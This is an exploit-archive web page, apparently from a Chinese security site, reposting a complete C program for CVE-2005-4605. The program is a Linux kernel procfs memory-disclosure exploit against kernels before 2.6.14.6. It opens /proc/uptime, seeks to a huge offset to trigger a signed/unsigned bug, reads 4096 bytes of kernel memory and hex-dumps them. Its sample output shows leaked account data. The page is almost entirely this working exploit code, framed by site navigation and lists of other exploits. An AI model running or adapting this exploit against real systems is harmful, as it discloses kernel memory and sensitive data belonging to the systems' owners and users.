首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Linux Kernel < 2.6.14.6 procfs Kernel Memory Disclosure Exploit
来源:http://jon.oberheide.org 作者:Oberheide 发布时间:2009-08-06  

/*
 * cve-2005-4605.c
 *
 * Linux Kernel < 2.6.14.6 procfs Kernel Memory Disclosure
 * Jon Oberheide <jon@oberheide.org>
 * http://jon.oberheide.org
 *
 * Information:
 *
 *   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4605
 *
 *   The procfs code (proc_misc.c) in Linux 2.6.14.3 and other versions before
 *   2.6.15 allows attackers to read sensitive kernel memory via unspecified
 *   vectors in which a signed value is added to an unsigned value.
 *
 * Usage:
 *
 *   $ gcc cve-2005-4605.c -o cve-2005-4605
 *   $ ./cve-2005-4605
 *   [+] Opened /proc/uptime.
 *   [+] Seek to offset 4294963199.
 *   [+] Read 4096 bytes, dumping to stdout...
 *   ...
 *   ... 00 00 00 00 11 00 00 00  ................................
 *   ... 3a 30 3a 72 6f 6f 74 00  localhost.......root.x.0:0:root.
 *   ... 0d 00 00 00 dc 91 0f 08  /root./bin/bash.....@...........
 *   ... bc af 0e 08 00 00 00 00  ............p...................
 *   ...
 *
 * Notes:
 *
 *   This one is _ancient_, but str0ke requested it! ;-)
 */

#define _FILE_OFFSET_BITS 64
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <stdbool.h>
#include <unistd.h>
#include <string.h>
#include <inttypes.h>
#include <limits.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

#define DUMP 4096
#define PROC "/proc/uptime"

#define TYPE_SIGNED(t) (! ((t) 0 < (t) -1))
#define TYPE_MAX(t) ((t) (! TYPE_SIGNED (t) ? (t) -1 : ~ (~ (t) 0 << (sizeof (t) * CHAR_BIT - 1))))

const char hex_asc[] = "0123456789abcdef";
#define hex_asc_lo(x) hex_asc[((x) & 0x0f)]
#define hex_asc_hi(x) hex_asc[((x) & 0xf0) >> 4]

void
hex_dump_to_buffer(const void *buf, size_t len, int rowsize, int groupsize, char *linebuf, size_t linebuflen, bool ascii)
{
 const uint8_t *ptr = buf;
 uint8_t ch;
 int j, lx = 0;
 int ascii_column;

 if (rowsize != 16 && rowsize != 32)
  rowsize = 16;

 if (!len)
  goto nil;
 if (len > rowsize)
  len = rowsize;
 if ((len % groupsize) != 0)
  groupsize = 1;

 switch (groupsize) {
 case 8: {
  const uint64_t *ptr8 = buf;
  int ngroups = len / groupsize;

  for (j = 0; j < ngroups; j++)
   lx += snprintf(linebuf + lx, linebuflen - lx,
    "%16.16llx ", (unsigned long long)*(ptr8 + j));
  ascii_column = 17 * ngroups + 2;
  break;
 }

 case 4: {
  const uint32_t *ptr4 = buf;
  int ngroups = len / groupsize;

  for (j = 0; j < ngroups; j++)
   lx += snprintf(linebuf + lx, linebuflen - lx,
    "%8.8x ", *(ptr4 + j));
  ascii_column = 9 * ngroups + 2;
  break;
 }

 case 2: {
  const uint16_t *ptr2 = buf;
  int ngroups = len / groupsize;

  for (j = 0; j < ngroups; j++)
   lx += snprintf(linebuf + lx, linebuflen - lx,
    "%4.4x ", *(ptr2 + j));
  ascii_column = 5 * ngroups + 2;
  break;
 }

 default:
  for (j = 0; (j < rowsize) && (j < len) && (lx + 4) < linebuflen;
    j++) {
   ch = ptr[j];
   linebuf[lx++] = hex_asc_hi(ch);
   linebuf[lx++] = hex_asc_lo(ch);
   linebuf[lx++] = ' ';
  }
  ascii_column = 3 * rowsize + 2;
  break;
 }
 if (!ascii)
  goto nil;

 while (lx < (linebuflen - 1) && lx < (ascii_column - 1))
  linebuf[lx++] = ' ';
 for (j = 0; (j < rowsize) && (j < len) && (lx + 2) < linebuflen; j++)
  linebuf[lx++] = (isascii(ptr[j]) && isprint(ptr[j])) ? ptr[j]
    : '.';
nil:
 linebuf[lx++] = '\0';
}

void
print_hex_dump(int rowsize, int groupsize, const void *buf, size_t len, bool ascii)
{
 const uint8_t *ptr = buf;
 int i, linelen, remaining = len;
 unsigned char linebuf[200];

 if (rowsize != 16 && rowsize != 32)
  rowsize = 16;

 for (i = 0; i < len; i += rowsize) {
  linelen = ((remaining) < (rowsize) ? (remaining) : (rowsize));
  remaining -= rowsize;
  hex_dump_to_buffer(ptr + i, linelen, rowsize, groupsize,
  linebuf, sizeof(linebuf), ascii);
  printf("%s\n", linebuf);
 }
}

int
main(void)
{
 int fd, ret;
 char buf[DUMP];
 off_t seek, offset=TYPE_MAX(off_t);

 memset(buf, 0, sizeof(buf));

 fd = open(PROC, O_RDONLY);
 if (fd == -1) {
  printf("[-] Error during open(2)\n");
  exit(1);
 }

 printf("[+] Opened " PROC ".\n");

 seek = lseek(fd, offset-DUMP, SEEK_SET);
 if (seek == -1) {
  printf("[-] Error during lseek(2).\n");
  exit(1);
 }

 printf("[+] Seek to offset %lld.\n", seek);

 ret = read(fd, buf, DUMP);
 if (ret == -1) {
  printf("[-] Error during read(2).\n");
  exit(1);
 }
 
 if (ret == 0) {
  printf("[-] read(2) return 0 bytes, your kernel may not be vulnerable.\n");
  exit(1);
 }

 printf("[+] Read %d bytes, dumping to stdout...\n\n", ret);

 sleep(3);

 print_hex_dump(32, 1, buf, ret, 1);

 return 0;
}
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MS Internet Explorer 8.0.7100.
·Tuniac v.090517c (.M3U File) L
·jetAudio v 7.1.9.4030 plus vx
·serv-u8 本地提权
·UltraPlayer Media Player 2.112
·jetAudio 7.1.9.4030 plus vx (.
·JetAudio 7.1.9.4030 Universal
·RadASM 2.2.1.6 Menu Editor (.m
·FreeBSD 7.2-RELEASE SCTP Local
·BlazeDVD 5.1/HDTV Player 6.0 (
·JetAudio 7.5.3.15 (.M3U File)
·jetAudio 7.1.9.4030 plus vx (.
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved